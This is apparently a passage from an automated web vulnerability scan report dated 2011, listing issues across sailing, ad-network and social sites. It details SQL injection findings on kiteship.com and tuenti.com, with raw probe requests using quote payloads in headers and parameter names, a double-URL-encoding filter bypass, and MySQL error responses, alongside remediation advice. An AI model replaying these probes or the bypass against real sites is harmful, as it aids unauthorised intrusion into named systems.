7.14. http://brxserv.btrll.com/v1/epix/2903/3844555/1938/2286/MbrcHW8wOlCcRNN35KAAAHkgAACO4AOqnLAAAAAAIoYe52LkGtZg/event.imp/r_64.aHR0cDovL2Iuc2NvcmVjYXJkcmVzZWFyY2guY29tL3A_YzE9MSZjMj02MDAwMDA2JmMzPSZjND0mYzU9MDEwMDAwJmM2PTI5MDMmYzEwPSZjQTE9OCZjQTI9NjAwMDAwNiZjQTM9Mzg0NDU1NSZjQTQ9MTkzOCZjQTU9MzkzJmNBNj0yOTAzJmNBMTA9MjI4NiZjdj0xLjcmY2o9JnJuPTEyOTU0ODI0NDImcj1odHRwJTNBJTJGJTJGcGl4ZWwucXVhbnRzZXJ2ZS5jb20lMkZwaXhlbCUyRnAtY2I2QzB6RkY3ZFdqSS5naWYlM0ZsYWJlbHMlM0RwLjI5MDMuMzg0NDU1NS4wJTJDYS4zOTMuMTkzOC4yMjg2JTJDdS5wcmUuMHgwJTNCbWVkaWElM0RhZCUzQnIlM0QxMjk1NDgyNDQy]]

7.15. http://brxserv.btrll.com/v1/epix/2903/3844555/1938/2286/MbrcHW8wOlCcRNN35KAAAHkgAACO4AOqnLAAAAAAIoYe52LkGtZg/event.mid/r_64.aHR0cDovLzI5MDEuYnRybGwuY29tL2ltcC8yOTAxLzQyNTgvUHJlUm9sbC45MTEuMTA5NzIzL21pZDtWaWRlbzsxMjk1NDgyNDQy

7.16. http://brxserv.btrll.com/v1/epix/2903/3844555/1938/2286/MbrcHW8wOlCcRNN35KAAAHkgAACO4AOqnLAAAAAAIoYe52LkGtZg/event.mid/r_64.aHR0cDovLzI5MDEuYnRybGwuY29tL2ltcC8yOTAxLzQyNTgvUHJlUm9sbC45MTEuMTA5NzIzL21pZDtWaWRlbzsxMjk1NDgyNDQy]]

7.17. http://ib.adnxs.com/mapuid

7.18. http://ib.adnxs.com/ptj

7.19. http://ib.adnxs.com/ptj

7.20. http://ib.adnxs.com/ptj

7.21. http://ib.adnxs.com/ptj

7.22. http://ib.adnxs.com/ptj

7.23. http://ib.adnxs.com/ptj

7.24. http://ib.adnxs.com/ptj

7.25. http://ib.adnxs.com/ptj

7.26. http://ib.adnxs.com/seg

7.27. http://www.tuenti.com/

7.28. http://www.tuenti.com/

7.29. http://www.tuenti.com/share

8. Cookie without HttpOnly flag set

8.1. http://americascup.mediaaccess.evolix.net/index.php

8.2. http://www.americascupmedia.com/index.php

8.3. http://www.beneteaucountdown.com/

8.4. http://www.w-w-i.com/velux_5_oceans_2010_race/

8.5. http://www.yachtscoring.com/event_results_cumulative.cfm

8.6. http://2822.v.fwmrm.net/ad/g/1

8.7. http://2822.v.fwmrm.net/ad/l/1

8.8. http://2822.v.fwmrm.net/ad/p/1

8.9. http://ad.afy11.net/ad

8.10. http://ad.doubleclick.net/click

8.11. http://ad.doubleclick.net/clk

8.12. http://brxserv.btrll.com/favicon.ico

8.13. http://brxserv.btrll.com/v1/epix/2903/3844555/1938/2286/

8.14. http://brxserv.btrll.com/v1/epix/2903/3844555/1938/2286/MbrcHW8wOlCcRNN35KAAAHkgAACO4AOqnLAAAAAAIoYe52LkGtZg/event.click/r_64.aHR0cDovLzI5MDEuYnRybGwuY29tL2Nsay8yOTAxLzQyNTgvUHJlUm9sbC45MTEuMTA5NzIzL25vbmUvO1ZpZGVvOzEyOTU0ODI0NDI]]

8.15. http://brxserv.btrll.com/v1/epix/2903/3844555/1938/2286/MbrcHW8wOlCcRNN35KAAAHkgAACO4AOqnLAAAAAAIoYe52LkGtZg/event.end/r_64.aHR0cDovLzI5MDEuYnRybGwuY29tL2ltcC8yOTAxLzQyNTgvUHJlUm9sbC45MTEuMTA5NzIzL2RvbmU7VmlkZW87MTI5NTQ4MjQ0Mg

8.16. http://brxserv.btrll.com/v1/epix/2903/3844555/1938/2286/MbrcHW8wOlCcRNN35KAAAHkgAACO4AOqnLAAAAAAIoYe52LkGtZg/event.end/r_64.aHR0cDovLzI5MDEuYnRybGwuY29tL2ltcC8yOTAxLzQyNTgvUHJlUm9sbC45MTEuMTA5NzIzL2RvbmU7VmlkZW87MTI5NTQ4MjQ0Mg]]

8.17. http://brxserv.btrll.com/v1/epix/2903/3844555/1938/2286/MbrcHW8wOlCcRNN35KAAAHkgAACO4AOqnLAAAAAAIoYe52LkGtZg/event.imp/r_64.aHR0cDovL2Iuc2NvcmVjYXJkcmVzZWFyY2guY29tL3A_YzE9MSZjMj02MDAwMDA2JmMzPSZjND0mYzU9MDEwMDAwJmM2PTI5MDMmYzEwPSZjQTE9OCZjQTI9NjAwMDAwNiZjQTM9Mzg0NDU1NSZjQTQ9MTkzOCZjQTU9MzkzJmNBNj0yOTAzJmNBMTA9MjI4NiZjdj0xLjcmY2o9JnJuPTEyOTU0ODI0NDImcj1odHRwJTNBJTJGJTJGcGl4ZWwucXVhbnRzZXJ2ZS5jb20lMkZwaXhlbCUyRnAtY2I2QzB6RkY3ZFdqSS5naWYlM0ZsYWJlbHMlM0RwLjI5MDMuMzg0NDU1NS4wJTJDYS4zOTMuMTkzOC4yMjg2JTJDdS5wcmUuMHgwJTNCbWVkaWElM0RhZCUzQnIlM0QxMjk1NDgyNDQy

8.18. http://brxserv.btrll.com/v1/epix/2903/3844555/1938/2286/MbrcHW8wOlCcRNN35KAAAHkgAACO4AOqnLAAAAAAIoYe52LkGtZg/event.imp/r_64.aHR0cDovL2Iuc2NvcmVjYXJkcmVzZWFyY2guY29tL3A_YzE9MSZjMj02MDAwMDA2JmMzPSZjND0mYzU9MDEwMDAwJmM2PTI5MDMmYzEwPSZjQTE9OCZjQTI9NjAwMDAwNiZjQTM9Mzg0NDU1NSZjQTQ9MTkzOCZjQTU9MzkzJmNBNj0yOTAzJmNBMTA9MjI4NiZjdj0xLjcmY2o9JnJuPTEyOTU0ODI0NDImcj1odHRwJTNBJTJGJTJGcGl4ZWwucXVhbnRzZXJ2ZS5jb20lMkZwaXhlbCUyRnAtY2I2QzB6RkY3ZFdqSS5naWYlM0ZsYWJlbHMlM0RwLjI5MDMuMzg0NDU1NS4wJTJDYS4zOTMuMTkzOC4yMjg2JTJDdS5wcmUuMHgwJTNCbWVkaWElM0RhZCUzQnIlM0QxMjk1NDgyNDQy]]

8.19. http://brxserv.btrll.com/v1/epix/2903/3844555/1938/2286/MbrcHW8wOlCcRNN35KAAAHkgAACO4AOqnLAAAAAAIoYe52LkGtZg/event.mid/r_64.aHR0cDovLzI5MDEuYnRybGwuY29tL2ltcC8yOTAxLzQyNTgvUHJlUm9sbC45MTEuMTA5NzIzL21pZDtWaWRlbzsxMjk1NDgyNDQy

8.20. http://brxserv.btrll.com/v1/epix/2903/3844555/1938/2286/MbrcHW8wOlCcRNN35KAAAHkgAACO4AOqnLAAAAAAIoYe52LkGtZg/event.mid/r_64.aHR0cDovLzI5MDEuYnRybGwuY29tL2ltcC8yOTAxLzQyNTgvUHJlUm9sbC45MTEuMTA5NzIzL21pZDtWaWRlbzsxMjk1NDgyNDQy]]

8.21. http://digg.com/submit

8.22. http://translate.googleusercontent.com/translate_c

8.23. http://www.barcelonaworldrace.org/

8.24. http://www.barcelonaworldrace.org/en/actualite/breves/detail/an-explanation-from-jp-estrella-damm-ready-to-pounce-0-8072

8.25. http://www.regattaregatta.com/

8.26. http://www.stumbleupon.com/submit

8.27. http://www.tuenti.com/

8.28. http://www.tuenti.com/

8.29. http://www.tuenti.com/share

8.30. http://www.usaca.info/

9. Password field with autocomplete enabled

9.1. http://americascup.mediaaccess.evolix.net/index.php

9.2. http://americascup.mediaaccess.evolix.net/index.php

9.3. http://digg.com/submit

9.4. http://digg.com/submit

9.5. http://translate.googleusercontent.com/translate_c

9.6. http://www.americascupmedia.com/index.php

9.7. http://www.americascupmedia.com/index.php

9.8. http://www.regattaregatta.com/

9.9. http://www.tuenti.com/

9.10. http://www.tuenti.com/share

9.11. http://www.usaca.info/

9.12. http://www.w-w-i.com/velux_5_oceans_2010_race/

10. Cross-domain POST

10.1. http://translate.googleusercontent.com/translate_c

10.2. http://translate.googleusercontent.com/translate_c

10.3. http://www.sailinganarchy.com/advertise.htm

11. Cross-domain Referer leakage

11.1. http://ad.doubleclick.net/adj/cm.martini/

11.2. http://ad.doubleclick.net/adj/cm.martini/

11.3. http://americascup.mediaaccess.evolix.net/index.php

11.4. http://armchairmango.blip.tv/posts

11.5. http://blip.tv/comments/

11.6. http://blip.tv/file/4639878

11.7. http://blip.tv/file/get/ArmchairMango-DRYSuitBecomesAWETSuit905.mp4

11.8. http://blip.tv/file/get/ArmchairMango-HappyNewYear2011AnnapolisFireworks827.mp4

11.9. http://blip.tv/file/get/ArmchairMango-MusicFtLauderdaleToKeyWest2011OnSeaCart30Sundog612.mp4

11.10. http://blip.tv/file/get/ArmchairMango-NeutrogenaAtTheStartOfTheBWRSailingAnarchy918.mp4

11.11. http://blip.tv/file/get/ArmchairMango-NeutrogenaSailingEscapingTheMed570.mp4

11.12. http://blip.tv/file/get/ArmchairMango-SundogSeaCart30FtLauderdaleToKeyWest2011DeckCam598.mp4

11.13. http://blip.tv/file/get/ArmchairMango-SundogSeaCart30FtLauderdaleToKeyWest2011DeckCam598.mp4

11.14. http://blip.tv/file/get/ArmchairMango-SundogSeaCart30FtLauderdaleToKeyWest2011DeckCam785.m4v

11.15. http://blip.tv/file/get/ArmchairMango-SundogSeaCart30FtLauderdaleToKeyWest2011DeckCam785.m4v

11.16. http://blip.tv/file/get/VZW-OfWebseriesAndWerewolvesVampireZombieWerewolf399.m4v

11.17. http://blip.tv/file/view/4639878

11.18. http://blip.tv/html5/

11.19. http://blip.tv/players/embed/

11.20. http://blip.tv/posts/

11.21. http://blip.tv/posts/

11.22. http://blip.tv/posts/report_inappropriate

11.23. http://blip.tv/users/blogging_info

11.24. http://blip.tv/users/login/

11.25. http://digg.com/submit

11.26. http://ib.adnxs.com/ptj

11.27. http://ib.adnxs.com/ptj

11.28. http://ib.adnxs.com/ptj

11.29. http://ib.adnxs.com/ptj

11.30. http://translate.googleusercontent.com/translate_c

11.31. http://translate.googleusercontent.com/translate_c

11.32. http://translate.googleusercontent.com/translate_c

11.33. http://www.americascupmedia.com/index.php

11.34. http://www.bymnews.com/news/newsList.php

11.35. http://www.stumbleupon.com/submit

11.36. http://www.tuenti.com/

11.37. http://www.tuenti.com/share

11.38. http://www.yachtscoring.com/event_results_cumulative.cfm

12. Cross-domain script include

12.1. http://americascup.mediaaccess.evolix.net/index.php

12.2. http://armchairmango.blip.tv/

12.3. http://armchairmango.blip.tv/posts

12.4. http://armchairmango.blip.tv/posts

12.5. http://backend.userland.com/creativeCommonsRssModule

12.6. http://blip.tv/file/4639878

12.7. http://digg.com/submit

12.8. http://translate.googleusercontent.com/translate_c

12.9. http://translate.googleusercontent.com/translate_c

12.10. http://www.americascupmedia.com/index.php

12.11. http://www.barcelonaworldrace.org/en/actualite/breves/detail/an-explanation-from-jp-estrella-damm-ready-to-pounce-0-8072

12.12. http://www.sailinganarchy.com/ADs/nauticexpo/nauticexpo.htm

12.13. http://www.sailinganarchy.com/breymaiersailing.com

12.14. http://www.sailinganarchy.com/calendar/index.php

12.15. http://www.sailinganarchy.com/editor/audio_video.php

12.16. http://www.sailinganarchy.com/editor/pimpin.php

12.17. http://www.sailinganarchy.com/index_page1.php

12.18. http://www.sailinganarchy.com/index_page2.php

12.19. http://www.sailinganarchy.com/none

12.20. http://www.stumbleupon.com/submit

13. File upload functionality

14. Email addresses disclosed

14.1. http://americascup.mediaaccess.evolix.net/scripts/jquery.cookie.js

14.2. http://americascup.mediaaccess.evolix.net/scripts/overlib.js

14.3. http://www.americascupmedia.com/scripts/jquery.cookie.js

14.4. http://www.americascupmedia.com/scripts/overlib.js

14.5. http://www.bymnews.com/news/newsList.php

14.6. http://www.bymnews.com/scripts/prototype.js

14.7. http://www.sailinganarchy.com/advertise.htm

14.8. http://www.sailinganarchy.com/breymaiersailing.com

14.9. http://www.sailinganarchy.com/calendar/index.php

14.10. http://www.sailinganarchy.com/editor/audio_video.php

14.11. http://www.sailinganarchy.com/editor/pimpin.php

14.12. http://www.sailinganarchy.com/index_page1.php

14.13. http://www.sailinganarchy.com/index_page2.php

14.14. http://www.sailinganarchy.com/java/ad_rotation.js

14.15. http://www.sailinganarchy.com/none

14.16. http://www.sailinganarchy.com/terms.htm

14.17. http://www.w-w-i.com/velux_5_oceans_2010_race/

14.18. http://www.yachtscoring.com/event_results_cumulative.cfm

15. Private IP addresses disclosed

15.1. http://digg.com/submit

15.2. http://digg.com/submit

16. HTML does not specify charset

16.1. http://2822.v.fwmrm.net/ad/g/1

16.2. http://ad.doubleclick.net/clk

16.3. http://backend.userland.com/creativeCommonsRssModule

16.4. http://backend.userland.com/favicon.ico

16.5. http://ib.adnxs.com/ptj

16.6. http://www.beneteaucountdown.com/favicon.ico

16.7. http://www.bymnews.com/news/newsList.php

16.8. http://www.opengroup.org/onlinepubs/009629399/apdxa.htm

16.9. http://www.sailinganarchy.com/ADs/nauticexpo/nauticexpo.htm

16.10. http://www.sailinganarchy.com/breymaiersailing.com

16.11. http://www.sailinganarchy.com/none

17. Content type incorrectly stated

17.1. http://ad.doubleclick.net/clk

17.2. http://blip.tv/file/get/ArmchairMango-SundogSeaCart30FtLauderdaleToKeyWest2011DeckCam785.m4v

17.3. http://brxserv.btrll.com/



1. SQL injection  next
There are 5 instances of this issue:

Issue background

SQL injection vulnerabilities arise when user-controllable data is incorporated into database SQL queries in an unsafe manner. An attacker can supply crafted input to break out of the data context in which their input appears and interfere with the structure of the surrounding query.

Various attacks can be delivered via SQL injection, including reading or modifying critical application data, interfering with application logic, escalating privileges within the database and executing operating system commands.

Remediation background

The most effective way to prevent SQL injection attacks is to use parameterised queries (also known as prepared statements) for all database access. This method uses two steps to incorporate potentially tainted data into SQL queries: first, the application specifies the structure of the query, leaving placeholders for each item of user input; second, the application specifies the contents of each placeholder. Because the structure of the query has already defined in the first step, it is not possible for malformed data in the second step to interfere with the query structure. You should review the documentation for your database and application platform to determine the appropriate APIs which you can use to perform parameterised queries. It is strongly recommended that you parameterise every variable data item that is incorporated into database queries, even if it is not obviously tainted, to prevent oversights occurring and avoid vulnerabilities being introduced by changes elsewhere within the code base of the application.

You should be aware that some commonly employed and recommended mitigations for SQL injection vulnerabilities are not always effective:



1.1. http://www.kiteship.com/ [Referer HTTP header]  next

Summary

Severity:   High
Confidence:   Certain
Host:   http://www.kiteship.com
Path:   /

Issue detail

The Referer HTTP header appears to be vulnerable to SQL injection attacks. A single quote was submitted in the Referer HTTP header, and a database error message was returned. Two single quotes were then submitted and the error message disappeared. You should review the contents of the error message, and the application's handling of other input, to confirm whether a vulnerability is present.

The database appears to be MySQL.

Remediation detail

The application should handle errors gracefully and prevent SQL error messages from being returned in responses.

Request 1

GET / HTTP/1.1
Host: www.kiteship.com
Accept: */*
Accept-Language: en
User-Agent: Mozilla/4.0 (compatible; MSIE 7.0; Windows NT 6.0)
Connection: close
Referer: http://www.google.com/search?hl=en&q='

Response 1

HTTP/1.1 200 OK
Date: Thu, 20 Jan 2011 00:48:58 GMT
Server: Apache/1.3.42 (Unix) mod_auth_passthrough/1.8 mod_log_bytes/1.2 mod_bwlimited/1.4 FrontPage/5.0.2.2635 mod_ssl/2.8.31 OpenSSL/0.9.8e-fips-rhel5
Connection: close
Content-Type: text/html
Content-Length: 14060

<!DOCTYPE html PUBLIC "-//W3C//DTD XHTML 1.0 Transitional//EN" "http://www.w3.org/TR/xhtml1/DTD/xhtml1-transitional.dtd"><html xmlns="http://www.w3.org/1999/xhtml"><head><title>KiteShip - Innovatio
...[SNIP]...
<font color="red">You have an error in your SQL syntax; check the manual that corresponds to your MySQL server version for the right syntax to use near '2011-01-19'' at line 1</font>
...[SNIP]...

Request 2

GET / HTTP/1.1
Host: www.kiteship.com
Accept: */*
Accept-Language: en
User-Agent: Mozilla/4.0 (compatible; MSIE 7.0; Windows NT 6.0)
Connection: close
Referer: http://www.google.com/search?hl=en&q=''

Response 2

HTTP/1.1 200 OK
Date: Thu, 20 Jan 2011 00:48:59 GMT
Server: Apache/1.3.42 (Unix) mod_auth_passthrough/1.8 mod_log_bytes/1.2 mod_bwlimited/1.4 FrontPage/5.0.2.2635 mod_ssl/2.8.31 OpenSSL/0.9.8e-fips-rhel5
Connection: close
Content-Type: text/html
Content-Length: 13478

<!DOCTYPE html PUBLIC "-//W3C//DTD XHTML 1.0 Transitional//EN" "http://www.w3.org/TR/xhtml1/DTD/xhtml1-transitional.dtd"><html xmlns="http://www.w3.org/1999/xhtml"><head><title>KiteShip - Innovatio
...[SNIP]...

1.2. http://www.kiteship.com/ [name of an arbitrarily supplied request parameter]  previous  next

Summary

Severity:   High
Confidence:   Certain
Host:   http://www.kiteship.com
Path:   /

Issue detail

The name of an arbitrarily supplied request parameter appears to be vulnerable to SQL injection attacks. A single quote was submitted in the name of an arbitrarily supplied request parameter, and a database error message was returned. Two single quotes were then submitted and the error message disappeared. You should review the contents of the error message, and the application's handling of other input, to confirm whether a vulnerability is present.

The database appears to be MySQL.

Remediation detail

The application should handle errors gracefully and prevent SQL error messages from being returned in responses.

Request 1

GET /?1'=1 HTTP/1.1
Host: www.kiteship.com
Accept: */*
Accept-Language: en
User-Agent: Mozilla/4.0 (compatible; MSIE 7.0; Windows NT 6.0)
Connection: close

Response 1

HTTP/1.1 200 OK
Date: Thu, 20 Jan 2011 00:48:49 GMT
Server: Apache/1.3.42 (Unix) mod_auth_passthrough/1.8 mod_log_bytes/1.2 mod_bwlimited/1.4 FrontPage/5.0.2.2635 mod_ssl/2.8.31 OpenSSL/0.9.8e-fips-rhel5
Connection: close
Content-Type: text/html
Content-Length: 14074

<!DOCTYPE html PUBLIC "-//W3C//DTD XHTML 1.0 Transitional//EN" "http://www.w3.org/TR/xhtml1/DTD/xhtml1-transitional.dtd"><html xmlns="http://www.w3.org/1999/xhtml"><head><title>KiteShip - Innovatio
...[SNIP]...
<font color="red">You have an error in your SQL syntax; check the manual that corresponds to your MySQL server version for the right syntax to use near '' AND date = '2011-01-19'' at line 1</font>
...[SNIP]...

Request 2

GET /?1''=1 HTTP/1.1
Host: www.kiteship.com
Accept: */*
Accept-Language: en
User-Agent: Mozilla/4.0 (compatible; MSIE 7.0; Windows NT 6.0)
Connection: close

Response 2

HTTP/1.1 200 OK
Date: Thu, 20 Jan 2011 00:48:49 GMT
Server: Apache/1.3.42 (Unix) mod_auth_passthrough/1.8 mod_log_bytes/1.2 mod_bwlimited/1.4 FrontPage/5.0.2.2635 mod_ssl/2.8.31 OpenSSL/0.9.8e-fips-rhel5
Connection: close
Content-Type: text/html
Content-Length: 13478

<!DOCTYPE html PUBLIC "-//W3C//DTD XHTML 1.0 Transitional//EN" "http://www.w3.org/TR/xhtml1/DTD/xhtml1-transitional.dtd"><html xmlns="http://www.w3.org/1999/xhtml"><head><title>KiteShip - Innovatio
...[SNIP]...

1.3. http://www.tuenti.com/share [Referer HTTP header]  previous  next

Summary

Severity:   High
Confidence:   Tentative
Host:   http://www.tuenti.com
Path:   /share

Issue detail

The Referer HTTP header appears to be vulnerable to SQL injection attacks. A single quote was submitted in the Referer HTTP header, and a general error message was returned. Two single quotes were then submitted and the error message disappeared. You should review the contents of the error message, and the application's handling of other input, to confirm whether a vulnerability is present.

Request 1

GET /share?url=http://www.elmundo.es/elmundo/2011/01/17/nautica/1295254542.html HTTP/1.1
Host: www.tuenti.com
Accept: */*
Accept-Language: en
User-Agent: Mozilla/4.0 (compatible; MSIE 7.0; Windows NT 6.0)
Connection: close
Referer: http://www.google.com/search?hl=en&q='

Response 1 (redirected)

HTTP/1.1 200 OK
Cache-Control: no-cache, must-revalidate
Expires: Mon, 26 Jul 2005 04:59:59 GMT
Content-Type: text/html
Set-Cookie: ond=deleted; expires=Wed, 20-Jan-2010 00:51:53 GMT; path=/; domain=.tuenti.com
Set-Cookie: ourl=%3Fm%3DShare%26url%3Dhttp%253A%252F%252Fwww.elmundo.es%252Felmundo%252F2011%252F01%252F17%252Fnautica%252F1295254542.html%26p%3D; path=/; domain=.tuenti.com
Set-Cookie: keep_ru=1; path=/; domain=.tuenti.com
Set-Cookie: ue=deleted; expires=Wed, 20-Jan-2010 00:51:53 GMT; path=/; domain=.tuenti.com
Set-Cookie: em=deleted; expires=Wed, 20-Jan-2010 00:51:53 GMT; path=/; domain=.tuenti.com
Set-Cookie: fa=deleted; expires=Wed, 20-Jan-2010 00:51:53 GMT; path=/; domain=.tuenti.com
Set-Cookie: et=deleted; expires=Wed, 20-Jan-2010 00:51:53 GMT; path=/; domain=.tuenti.com
Connection: close
Date: Thu, 20 Jan 2011 00:51:54 GMT
Content-Length: 41802

<!DOCTYPE html PUBLIC "-//W3C//DTD XHTML 1.0 Strict//EN""http://www.w3.org/TR/xhtml1/DTD/xhtml1-strict.dtd"><html xmlns="http://www.w3.org/1999/xhtml" xml:lang="en_US" lang="en_US" xmlns:fw="http://ww
...[SNIP]...
.call(arguments)));}},/** * @param args[] */warn: function() {if(this._is_enabled) {console.warn.apply(console, ["*DEPRECATED*"].concat(Array.prototype.slice.call(arguments)));}},/** * @param args[] */error: function() {if(this._is_enabled) {console.error.apply(console, ["*DEPRECATED*"].concat(Array.prototype.slice.call(arguments)));}},/** * @param Object object */dir: function(object) {if(this._is_enabl
...[SNIP]...
oad correctly');TConsole.log('Possible reasons include (but are not limited to):');TConsole.log('- Missing load.trace() call at end of file');TConsole.log('- Syntax error in file');TConsole.log('- PHP exception/error thrown on page load. Check source of html response.');TConsole.log('Number of missing files:', loader.pending_list_length);TConsole.log('Missing files:');for (var i in loader.pending_list) {if (
...[SNIP]...

Request 2

GET /share?url=http://www.elmundo.es/elmundo/2011/01/17/nautica/1295254542.html HTTP/1.1
Host: www.tuenti.com
Accept: */*
Accept-Language: en
User-Agent: Mozilla/4.0 (compatible; MSIE 7.0; Windows NT 6.0)
Connection: close
Referer: http://www.google.com/search?hl=en&q=''

Response 2

HTTP/1.1 200 OK
Cache-Control: no-cache, must-revalidate
Expires: Mon, 26 Jul 2005 04:59:59 GMT
Content-Type: text/html
Set-Cookie: ond=deleted; expires=Wed, 20-Jan-2010 00:51:54 GMT; path=/; domain=.tuenti.com
Set-Cookie: ourl=%3Fm%3DShare%26url%3Dhttp%253A%252F%252Fwww.elmundo.es%252Felmundo%252F2011%252F01%252F17%252Fnautica%252F1295254542.html%26p%3D; path=/; domain=.tuenti.com
Set-Cookie: keep_ru=1; path=/; domain=.tuenti.com
Set-Cookie: ue=deleted; expires=Wed, 20-Jan-2010 00:51:54 GMT; path=/; domain=.tuenti.com
Set-Cookie: em=deleted; expires=Wed, 20-Jan-2010 00:51:54 GMT; path=/; domain=.tuenti.com
Set-Cookie: fa=deleted; expires=Wed, 20-Jan-2010 00:51:54 GMT; path=/; domain=.tuenti.com
Set-Cookie: et=deleted; expires=Wed, 20-Jan-2010 00:51:54 GMT; path=/; domain=.tuenti.com
Connection: close
Date: Thu, 20 Jan 2011 00:51:55 GMT
Content-Length: 41802

<!DOCTYPE html PUBLIC "-//W3C//DTD XHTML 1.0 Strict//EN""http://www.w3.org/TR/xhtml1/DTD/xhtml1-strict.dtd"><html xmlns="http://www.w3.org/1999/xhtml" xml:lang="en_US" lang="en_US" xmlns:fw="http://ww
...[SNIP]...

1.4. http://www.tuenti.com/share [User-Agent HTTP header]  previous  next

Summary

Severity:   High
Confidence:   Tentative
Host:   http://www.tuenti.com
Path:   /share

Issue detail

The User-Agent HTTP header appears to be vulnerable to SQL injection attacks. A single quote was submitted in the User-Agent HTTP header, and a general error message was returned. Two single quotes were then submitted and the error message disappeared. You should review the contents of the error message, and the application's handling of other input, to confirm whether a vulnerability is present.

Request 1

GET /share HTTP/1.1
Host: www.tuenti.com
Accept: */*
Accept-Language: en
User-Agent: Mozilla/4.0 (compatible; MSIE 7.0; Windows NT 6.0)'
Connection: close

Response 1 (redirected)

HTTP/1.1 200 OK
Cache-Control: no-cache, must-revalidate
Expires: Mon, 26 Jul 2005 04:59:59 GMT
Content-Type: text/html
Connection: close
Date: Thu, 20 Jan 2011 00:51:34 GMT
Content-Length: 39370

<!DOCTYPE html PUBLIC "-//W3C//DTD XHTML 1.0 Strict//EN""http://www.w3.org/TR/xhtml1/DTD/xhtml1-strict.dtd"><html xmlns="http://www.w3.org/1999/xhtml" xml:lang="en_US" lang="en_US" xmlns:fw="http://ww
...[SNIP]...
.call(arguments)));}},/** * @param args[] */warn: function() {if(this._is_enabled) {console.warn.apply(console, ["*DEPRECATED*"].concat(Array.prototype.slice.call(arguments)));}},/** * @param args[] */error: function() {if(this._is_enabled) {console.error.apply(console, ["*DEPRECATED*"].concat(Array.prototype.slice.call(arguments)));}},/** * @param Object object */dir: function(object) {if(this._is_enabl
...[SNIP]...
oad correctly');TConsole.log('Possible reasons include (but are not limited to):');TConsole.log('- Missing load.trace() call at end of file');TConsole.log('- Syntax error in file');TConsole.log('- PHP exception/error thrown on page load. Check source of html response.');TConsole.log('Number of missing files:', loader.pending_list_length);TConsole.log('Missing files:');for (var i in loader.pending_list) {if (
...[SNIP]...

Request 2

GET /share HTTP/1.1
Host: www.tuenti.com
Accept: */*
Accept-Language: en
User-Agent: Mozilla/4.0 (compatible; MSIE 7.0; Windows NT 6.0)''
Connection: close

Response 2

HTTP/1.1 200 OK
Cache-Control: no-cache, must-revalidate
Expires: Mon, 26 Jul 2005 04:59:59 GMT
Content-Type: text/html
Connection: close
Date: Thu, 20 Jan 2011 00:51:35 GMT
Content-Length: 39369

<!DOCTYPE html PUBLIC "-//W3C//DTD XHTML 1.0 Strict//EN""http://www.w3.org/TR/xhtml1/DTD/xhtml1-strict.dtd"><html xmlns="http://www.w3.org/1999/xhtml" xml:lang="en_US" lang="en_US" xmlns:fw="http://ww
...[SNIP]...

1.5. http://www.tuenti.com/share [User-Agent HTTP header]  previous  next

Summary

Severity:   High
Confidence:   Tentative
Host:   http://www.tuenti.com
Path:   /share

Issue detail

The User-Agent HTTP header appears to be vulnerable to SQL injection attacks. A single quote was submitted in the User-Agent HTTP header, and a general error message was returned. Two single quotes were then submitted and the error message disappeared. You should review the contents of the error message, and the application's handling of other input, to confirm whether a vulnerability is present.

The application attempts to block SQL injection attacks but this can be circumvented by double URL-encoding the blocked characters - for example, by submitting %2527 instead of the ' character.

Remediation detail

There is probably no need to perform a second URL-decode of the value of the User-Agent HTTP header as the web server will have already carried out one decode. In any case, the application should perform its input validation after any custom canonicalisation has been carried out.

Request 1

GET /share?url=http://www.elmundo.es/elmundo/2011/01/17/nautica/1295254542.html HTTP/1.1
Host: www.tuenti.com
Accept: */*
Accept-Language: en
User-Agent: Mozilla/4.0 (compatible; MSIE 7.0; Windows NT 6.0)%2527
Connection: close

Response 1 (redirected)

HTTP/1.1 200 OK
Cache-Control: no-cache, must-revalidate
Expires: Mon, 26 Jul 2005 04:59:59 GMT
Content-Type: text/html
Set-Cookie: ond=deleted; expires=Wed, 20-Jan-2010 00:51:49 GMT; path=/; domain=.tuenti.com
Set-Cookie: ourl=%3Fm%3DShare%26url%3Dhttp%253A%252F%252Fwww.elmundo.es%252Felmundo%252F2011%252F01%252F17%252Fnautica%252F1295254542.html%26p%3D; path=/; domain=.tuenti.com
Set-Cookie: keep_ru=1; path=/; domain=.tuenti.com
Set-Cookie: ue=deleted; expires=Wed, 20-Jan-2010 00:51:49 GMT; path=/; domain=.tuenti.com
Set-Cookie: em=deleted; expires=Wed, 20-Jan-2010 00:51:49 GMT; path=/; domain=.tuenti.com
Set-Cookie: fa=deleted; expires=Wed, 20-Jan-2010 00:51:49 GMT; path=/; domain=.tuenti.com
Set-Cookie: et=deleted; expires=Wed, 20-Jan-2010 00:51:49 GMT; path=/; domain=.tuenti.com
Connection: close
Date: Thu, 20 Jan 2011 00:51:50 GMT
Content-Length: 41802

<!DOCTYPE html PUBLIC "-//W3C//DTD XHTML 1.0 Strict//EN""http://www.w3.org/TR/xhtml1/DTD/xhtml1-strict.dtd"><html xmlns="http://www.w3.org/1999/xhtml" xml:lang="en_US" lang="en_US" xmlns:fw="http://ww
...[SNIP]...
.call(arguments)));}},/** * @param args[] */warn: function() {if(this._is_enabled) {console.warn.apply(console, ["*DEPRECATED*"].concat(Array.prototype.slice.call(arguments)));}},/** * @param args[] */error: function() {if(this._is_enabled) {console.error.apply(console, ["*DEPRECATED*"].concat(Array.prototype.slice.call(arguments)));}},/** * @param Object object */dir: function(object) {if(this._is_enabl
...[SNIP]...
oad correctly');TConsole.log('Possible reasons include (but are not limited to):');TConsole.log('- Missing load.trace() call at end of file');TConsole.log('- Syntax error in file');TConsole.log('- PHP exception/error thrown on page load. Check source of html response.');TConsole.log('Number of missing files:', loader.pending_list_length);TConsole.log('Missing files:');for (var i in loader.pending_list) {if (
...[SNIP]...

Request 2

GET /share?url=http://www.elmundo.es/elmundo/2011/01/17/nautica/1295254542.html HTTP/1.1
Host: www.tuenti.com
Accept: */*
Accept-Language: en
User-Agent: Mozilla/4.0 (compatible; MSIE 7.0; Windows NT 6.0)%2527%2527
Connection: close

Response 2

HTTP/1.1 200 OK
Cache-Control: no-cache, must-revalidate
Expires: Mon, 26 Jul 2005 04:59:59 GMT
Content-Type: text/html
Set-Cookie: ond=deleted; expires=Wed, 20-Jan-2010 00:51:50 GMT; path=/; domain=.tuenti.com
Set-Cookie: ourl=%3Fm%3DShare%26url%3Dhttp%253A%252F%252Fwww.elmundo.es%252Felmundo%252F2011%252F01%252F17%252Fnautica%252F1295254542.html%26p%3D; path=/; domain=.tuenti.com
Set-Cookie: keep_ru=1; path=/; domain=.tuenti.com
Set-Cookie: ue=deleted; expires=Wed, 20-Jan-2010 00:51:50 GMT; path=/; domain=.tuenti.com
